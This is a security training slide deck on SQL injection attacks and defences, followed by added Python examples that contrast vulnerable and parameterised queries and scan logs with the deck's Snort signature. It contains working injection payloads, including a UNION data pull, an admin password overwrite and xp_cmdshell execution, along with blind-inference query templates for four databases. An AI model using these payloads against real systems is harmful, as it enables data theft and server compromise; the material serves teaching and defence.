Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
 
Overview of Hyperledger Foundation
Overview of Hyperledger FoundationOverview of Hyperledger Foundation
Overview of Hyperledger Foundation
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdf
 

Web application attacks using SQL injection and countermeasures

  • 1. SQL INJECTION ATTACKS
    Cade Zvavanjanja, CISO, Gainful Information Security
  • 2. OUTLINE
    - Background of SQL Injection
    - Techniques and Examples
    - Preventing SQL Injection
    - Demo
    - Wrap-Up
    - Questions
  • 3. BACKGROUND OF SQL INJECTION
  • 4. DATABASES: WHERE ARE THEY NOW?
    - Mainframes: Fat Server
    - Desktop Apps: Fat Client
    - Web Apps: Fat Server & Fat Client
  • 5. WHY IS SQL A STANDARD?
    Relational Database: Platform Independence, Loose Semantics, Runtime Interpretation
  • 6. FLEXIBILITY = VULNERABILITY
    - Simple Injection
    - Decoding Error Messages
    - Blind Injection
    - Encoding Exploits
    - Stored Procedures
    ---
    - Programmer Error (Faulty Logic)
  • 7. SQL Injection Techniques
  • 8. IMPORTANT SYMBOLS
    - '   "Hack"
    - --  "Comment Out"
    - ;   "End Statement"
    - %, *  "Wildcards"
  • 9. SQL INJECTION DEFINITION
    The input field is modified in such a way that the database returns unintended data.
    SQL: SELECT <column name> FROM <Table name> WHERE <logic expression>
  • 10. EXAMPLE: DATABASE SCHEMA
    - Table Users
      - Has columns "username" and "password"
      - Accessed when users log in
    - Table Customers
      - Has column "phone"
      - Users can look up other customer phone numbers by name
    - Application does no input validation
  • 11. RETURNING EXTRA ROWS WITH "UNION"
    - Query: SELECT phone FROM Customers WHERE last_name = '<name>'
    - Input: x' UNION SELECT username FROM users WHERE 'x' = 'x
  • 12. MODIFYING RECORDS
    - Application has password changing page
    - SQL: UPDATE users SET password = '<newpassword>' WHERE username = '<username>'
    - Input: newpassword' WHERE username LIKE '%admin%' --
  • 13. MS SQL SERVER
    - Default SQL Server setup
      - Default system admin account "sa" enabled
      - No password!!!
    - Supports multiple queries
    - "Extended stored procedures": C/C++ DLL files
      - Read/write external files
      - Access command line
  • 14. EXPLOITING SQL SERVER
    - Use phone look-up query again: SELECT phone FROM customers WHERE last_name = '<name>'
    - Input: '; exec master..xp_cmdshell 'iisreset'; --
  • 15. DATA-MINING WITH SQL INJECTION
    - Three classes of data-mining
      - In-band
      - Out-of-band
      - Inference
  • 16. IN-BAND ATTACKS
    - Data is included in response from the web server
    - Could be a well rendered web page
    - Using UNION SELECTs
    - Error messages
  • 17. OUT-OF-BAND ATTACKS
    - Data is retrieved using another communication channel:
      - UTL_HTTP.REQUEST
      - OPENROWSET
      - XP_SENDMAIL
  • 18. INFERENCE ATTACKS
    - At the core of inference is a question
    - Action taken based upon the answer
    - Chris Anley's time delay:
        declare @s varchar(8000)
        select @s = db_name()
        if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'
  • 19. INFERENCE ATTACKS...CONT:
    - Examples:
      - Time Delay
      - Generate 200/500 responses
      - Response Variation
    - Wildly silly example: send mail to tech support of XYZ Corp about a modem problem or a monitor problem; if the call that comes back is about a modem problem, we know the answer
  • 20. INFERENCE ATTACKS...CONT:
    - CASE statements in SQL: SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END
  • 21. INFERENCE THROUGH WEB SERVER RESPONSE CODES
    - Need a query that will compile fine but generate an error on branch execution: SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
  • 22. INFERENCE THROUGH WEB SERVER RESPONSE CODES...CONT:
    - Notes:
      - Works well with SQL Server, Oracle, DB2
      - MySQL returns NULL
      - Informix ODBC driver returns 200, even in the event of an error
      - Response code could be 302 Redirect, etc.; the principle is the same
      - Leaves a large number of 500 responses in log files
      - App environments like PL/SQL will return 404 instead of 500
  • 23. INFERENCE THROUGH RESPONSE VARIATIONS:
    - Parameter Splitting and Balancing
    - Avoids 500 responses
  • 24. PARAMETER SPLITTING AND BALANCING
    - 'NGSSOFTWARE'
    - 'NGSSOFTWA'+'RE'
    - 'NGSSOFTWA'||'RE'
    - 'NGSSOFTWA'|| (SUBSELECT RETURNS R) || 'E'
    - 'NGSSOFTWA' + (SUBSELECT RETURNS R) + 'E'
    - 2
    - 1 + 1
    - 1 + (SUBSELECT RETURNS 1)
  • 25. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS
    - Cold Fusion Management
      - Converts " to &quot;
      - Converts & to &amp;
      - Converts > to &gt;
      - Converts < to &lt;
      - Doubles up single quotes
      - Usually means the attack vector is numeric input
    - PHP often doubles single quotes (magic quotes)
  • 26. DEALING WITH VARIOUS APPLICATION ENVIRONMENTS... CONT:
    - Rather than > use BETWEEN X AND Y
    - Rather than & use ^: A xor BIT = C
      - If C is greater than A then Bit is not set
      - If C is less than A then Bit is set
    - Rather than 'A' use CHR(65)/CHAR(65)
  • 27. INFERENCE QUERIES...
    - SQL Server, string data:
        ' + (select case when ascii(substring((sub-query),the_byte,1))^the_bit between 0 and ascii(substring((sub-query),the_byte,1)) then char(known_value) else char(1/0) end) + '
  • 28. INFERENCE QUERIES...
    - Oracle, numeric:
        + (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then 0 else 1/0 end from dual)
  • 29. INFERENCE QUERIES...
    - Oracle, string data:
        '|| (select case when bitand(ascii(substr((sub-query),the_byte,1)), the_bit) between 1 and 255 then chr(known_val) else chr(1/0) end from dual) ||'
  • 30. INFERENCE QUERIES...
    - MySQL, numeric:
        + (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end
      (uses page response variation)
  • 31. INFERENCE QUERIES...
    - MySQL, string data:
        ' + (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + '
      (one returns no recordset, the other returns all rows)
  • 32. INFERENCE QUERIES...
    - Informix, numeric:
        + (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1
  • 33. INFERENCE QUERIES...
    - Informix, string data:
        ' || (select distinct case when bitval((SELECT distinct DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,"0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
  • 34. PREVENTING SQL INJECTION
  • 35. PREVENTING SQL INJECTION
    - Input Validation
    - Input Checking Functions
    - Access Rights
    - User Permissions
    - Variable Placeholders
    - Stored Procedures
  • 36. INPUT VALIDATION
    - Checks
      - Type
      - Size
      - Format
      - Range
    - Replace quotation marks
    "All input is wrong and dangerous"
  • 37. INPUT CHECKING FUNCTIONS
    - Built-in character rejection
        $sql = "SELECT * FROM Users WHERE ID = '" . $_GET['id'] . "'";
        $sql = "SELECT * FROM Users WHERE ID =" . mysql_real_escape_string($_GET['id']);
        $result = mysql_query($sql);
  • 38. ACCESS RIGHTS
    Web User vs. System Administrator ('sa')
  • 39. USER PERMISSIONS
    - Limit query access rights
      - SELECT
      - UPDATE
      - DROP
    - Restricted statement access
      - Global-specific
      - Database-specific
      - Table-specific
  • 40. VARIABLE PLACEHOLDERS (?)
    - Defense from string concatenation
    - Enforcing database data types
        PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?");
        prep.setString(1, pwd);
  • 41. STORED PROCEDURES
    - Use error checking variables
    - Buffer direct database access
  • 42. DEMONSTRATION
  • 43. COUNTERMEASURES
    - System Administrators
      - Whitelist / Blacklist Input Validation
      - Least Privileges
      - Application firewalls
    - Developer
      - Stored Procedures
      - Parameterized queries
      - Exception handling
  • 44. WHITELIST INPUT VALIDATION
    - UrlScan v3.0 restricts the types of HTTP requests that IIS will process:
        [SQL Injection Headers]
        AppliesTo=.asp,.aspx
        [SQL Injection Headers Strings]
        --
        @ ; also catches @@
        alter
        delete
        drop
        exec
        insert
    - SNORT: create a rule to check for SQL attack
        alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established; uricontent:".php | .aspx | .asp"; pcre:"/(%27)|(')|(--)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)
  • 45. LEAST PRIVILEGES
    - Enforce least privileges
      - CREATE / DELETE
    - Does not guarantee security
    - Access to a portion of the data
      - Create views
  • 46. CONCLUSIONS
    - SQL Injection continues to evolve with new technologies
    - Dangerous effects
      - Access to critical information
      - Updating data not meant to be updated
      - Exploiting the DBMS to directly affect the server and its resources
    - Prevention of SQL Injection
      - Input Validation and Query Building
      - Permissions and Access Rights
      - Variable Placeholders (Prepare) and Stored Procedures
  • 47. QUESTIONS
    1) What could prevent the 'Students' table from being dropped?
    2) What is another way to prevent injection?
  • 48. REFERENCES
    - Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter 27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php-center.de/en-html-manual/security.database.sql-injection.html>.
    - Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt, 1989. 427-433.
    - "Exploits of a Mom." xkcd.com. 4 Mar. 2008 <http://xkcd.com/327/>.
    - Finnigan, Pete. "SQL Injection and Oracle, Part One." SecurityFocus 21 November 2002. 07 Apr. 2005 <http://www.securityfocus.com/infocus/1644>.
    - Harper, Mitchell. "SQL Injection Attacks: Are You Safe?" Dev Articles. 29 May 2002. 07 Apr. 2005 <http://www.devarticles.com/c/a/MySQL/SQL-Injection-Attacks-Are-You-Safe/2/>.
  • 49. Thank You
    Tel: +236 733 782 490, +263 773 796 365, +263 -4- 733 117
    Eml: info@gis.co.zw, cade@gis.co.zw
    Web: www.gis.co.zw
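The phone look-up of slides 10 and 11 and the password change of slide 12, written twice against the deck's schema in an in-memory SQLite database: once by string concatenation, as the slides show it, and once with the variable placeholders of slide 40, together with a whitelist validator for the type, size and format checks of slide 36. This is an added example, not code from the deck or from Gainful Information Security; the sample rows, the allowed surname character class and the function names are assumptions made for it.

```python
import re
import sqlite3


# Schema from slides 10 and 11 of the deck (tables Users and Customers),
# filled with constructed sample rows so the example runs offline.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE customers (last_name TEXT, phone TEXT);
        INSERT INTO users VALUES ('admin', 'admin-secret'), ('alice', 'alice-secret');
        INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0101');
        """
    )
    return conn


def lookup_phone_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # Slide 11's query assembled by string concatenation: the input is
    # spliced into the SQL text, so a quote inside it closes the literal
    # and whatever follows is parsed as SQL.
    sql = "SELECT phone FROM customers WHERE last_name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_phone_parameterised(conn: sqlite3.Connection, name: str) -> list:
    # Slide 40's variable placeholder: the statement is parsed first and
    # the value is bound afterwards, so it can only be compared as data.
    sql = "SELECT phone FROM customers WHERE last_name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def change_password(conn: sqlite3.Connection, username: str, new_password: str) -> int:
    # Slide 12's UPDATE with both values bound.  The row count is returned
    # so the caller can confirm that exactly one account was changed.
    cur = conn.execute(
        "UPDATE users SET password = ? WHERE username = ?", (new_password, username)
    )
    conn.commit()
    return cur.rowcount


# Slide 36's checks (type, size, format) as a whitelist validator.  The
# allowed character class is an assumption for this example: letters,
# spaces, hyphens and apostrophes, because real surnames contain them.
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z' -]{0,63}$")


def validate_last_name(name: object) -> str:
    if not isinstance(name, str):                      # type
        raise ValueError("last_name must be a string")
    if not 1 <= len(name) <= 64:                       # size
        raise ValueError("last_name length out of range")
    if not NAME_RE.fullmatch(name):                    # format
        raise ValueError("last_name contains disallowed characters")
    return name


def lookup_phone(conn: sqlite3.Connection, name: str) -> list:
    # Defence in depth: validate the input, then bind it as a parameter.
    return lookup_phone_parameterised(conn, validate_last_name(name))


if __name__ == "__main__":
    db = build_db()
    probe = "x' UNION SELECT username FROM users WHERE 'x' = 'x"  # slide 11's input
    print("concatenated:", lookup_phone_vulnerable(db, probe))     # ['admin', 'alice']
    print("parameterised:", lookup_phone_parameterised(db, probe))  # []
    print("validated:", lookup_phone(db, "Smith"))                   # ['555-0100']
```

Run against slide 11's input, the concatenated query returns the user names from the Users table while the placeholder query returns nothing, because the whole string is compared as a surname. The validator also rejects that input, but it accepts a name like O'Brien, quote included, which is why slide 36's validation is a second line of defence rather than the fix: the placeholder is what makes the quote harmless. Slide 12's input is likewise stored as a literal password for the one named account and touches no other row.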
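Slide 22 notes that response-code inference leaves a large number of 500 responses in the log files, and slide 44 pairs a UrlScan filter with a Snort rule keyed on the quote and comment characters of slide 8. The following Python is added here and is not part of the deck: it runs both checks over constructed access-log lines, applying the pcre from slide 44's Snort rule to each request URI and counting 500 responses per client. The log lines, the client addresses, the lookup.php path and the burst threshold are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Common Log Format lines (not from the deck): two ordinary
# look-ups from one client, then a second client that sends slide 11's
# UNION input and follows it with a run of requests that make the page fail.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:10:00:01 +0000] "GET /lookup.php?name=Smith HTTP/1.1" 200 512
203.0.113.5 - - [10/May/2024:10:00:02 +0000] "GET /lookup.php?name=O%27Brien HTTP/1.1" 200 498
198.51.100.7 - - [10/May/2024:10:00:03 +0000] "GET /lookup.php?name=x%27%20UNION%20SELECT%20username%20FROM%20users%20WHERE%20%27x%27%3D%27x HTTP/1.1" 200 1200
198.51.100.7 - - [10/May/2024:10:00:04 +0000] "GET /lookup.php?name=Smith%27 HTTP/1.1" 500 312
198.51.100.7 - - [10/May/2024:10:00:05 +0000] "GET /lookup.php?name=Smith%27 HTTP/1.1" 500 312
198.51.100.7 - - [10/May/2024:10:00:06 +0000] "GET /lookup.php?name=Smith%27 HTTP/1.1" 500 312
198.51.100.7 - - [10/May/2024:10:00:07 +0000] "GET /lookup.php?name=Smith%27 HTTP/1.1" 500 312
198.51.100.7 - - [10/May/2024:10:00:08 +0000] "GET /lookup.php?name=Smith%27 HTTP/1.1" 500 312
198.51.100.7 - - [10/May/2024:10:00:09 +0000] "GET /lookup.php?name=Smith%27 HTTP/1.1" 500 312
"""

# Common Log Format: client, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# The pcre from slide 44's Snort rule, unchanged: /(%27)|(')|(--)|(%23)|(#)/i
SQLI_RE = re.compile(r"(%27)|(')|(--)|(%23)|(#)", re.IGNORECASE)


def parse_line(line: str):
    """Return the fields of one log line as a dict, or None if it is not CLF."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_suspicious_uri(path: str) -> bool:
    # Match the raw URI as Snort's uricontent/pcre would, and the decoded
    # form as well so that a percent-encoded quote is not missed.
    return bool(SQLI_RE.search(path) or SQLI_RE.search(unquote(path)))


def analyse(log_text: str, burst_threshold: int = 5) -> dict:
    """Signature hits per request plus clients with a burst of 500 responses."""
    signature_hits = []
    errors_by_ip = Counter()
    parsed = 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parsed += 1
        if is_suspicious_uri(rec["path"]):
            signature_hits.append((rec["ip"], rec["path"]))
        if rec["status"] == "500":
            errors_by_ip[rec["ip"]] += 1
    # Slide 22's observation: inference through response codes piles up
    # 500s in the log, so a client exceeding the threshold is flagged.
    bursts = {ip: n for ip, n in errors_by_ip.items() if n >= burst_threshold}
    # Strongest signal: a client that both trips the signature and causes a burst.
    suspects = sorted({ip for ip, _ in signature_hits} & set(bursts))
    return {
        "parsed": parsed,
        "signature_hits": signature_hits,
        "error_bursts": bursts,
        "suspects": suspects,
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    print("parsed lines:", report["parsed"])                 # 9
    print("signature hits:", len(report["signature_hits"]))  # 8
    print("500 bursts:", report["error_bursts"])             # {'198.51.100.7': 6}
    print("suspects:", report["suspects"])                   # ['198.51.100.7']
```

The second line of the sample, a legitimate look-up for O'Brien, trips the slide 44 signature exactly as the injection attempts do, because the rule only sees a quote. That is the false-positive cost of a character blacklist, and it is why the burst count from slide 22 is used here to corroborate a match before a client is reported, and why the deck's real fix stays at the application: whitelist validation and parameterised queries.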

Editor's notes

  1. RFID virus uses MS SQL Server commands.
  2. PHP example
  3. May remove this slide
  4. http://sacs.ucf.edu/ccr/cct_welcome.asp
  5. What is whitelist/blacklist input validation: explain. Choose whitelist over blacklist; it is much easier to accept valid states than it is to deny them.
  6. This will not prevent SQL injection attacks but it will minimize them. Create/Delete: your application will most likely never have to create and drop tables at runtime. Elevation of privileges. Views should only access data that is required for the application.